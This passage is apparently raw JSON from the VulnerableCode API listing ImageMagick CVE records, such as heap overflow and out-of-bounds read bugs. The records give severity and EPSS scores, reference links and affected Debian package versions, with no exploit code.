"VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13311" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xnkt-e7mn-e7du" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82015?format=api", "vulnerability_id": "VCID-xsue-s6sg-aqff", "summary": "ImageMagick: heap-based buffer overflow in WriteOnePNGImage in coders/png.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25674.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25674.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25674", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47047", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47117", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.47112", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0024", "scoring_system": "epss", "scoring_elements": "0.4706", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54488", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54509", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54503", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54515", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54497", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54476", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54387", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54456", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00313", "scoring_system": "epss", "scoring_elements": "0.54465", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25674" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25674", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25674" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891928", "reference_id": "1891928", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891928" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25674" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xsue-s6sg-aqff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78151?format=api", "vulnerability_id": "VCID-xtfv-8vvu-qudb", "summary": "ImageMagick: Division by zero in ReadEnhMetaFile lead to DoS", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-40211.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-40211.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-40211", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.2592", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25984", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.26027", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25798", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25868", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25919", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.2593", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25888", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25833", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25836", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25818", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25788", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00092", "scoring_system": "epss", "scoring_elements": "0.25733", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-40211" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40211", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40211" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235480", "reference_id": "2235480", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235480" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/4097", "reference_id": "4097", "reference_type": "", "scores": [ { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-03T18:10:55Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4097" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:5461", "reference_id": "RHSA-2023:5461", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:5461" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-40211" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xtfv-8vvu-qudb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81532?format=api", "vulnerability_id": "VCID-yhmq-s1jh-17bh", "summary": "ImageMagick: out-of-bounds read in ReadHEICImageByID function in coders/heic.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10251.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10251.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-10251", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67613", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67649", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.6767", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67651", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67702", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67716", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67739", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67724", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67691", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67727", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.6774", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00542", "scoring_system": "epss", "scoring_elements": "0.67721", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-10251" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10251", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10251" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1813322", "reference_id": "1813322", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1813322" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953741", "reference_id": "953741", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953741" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": 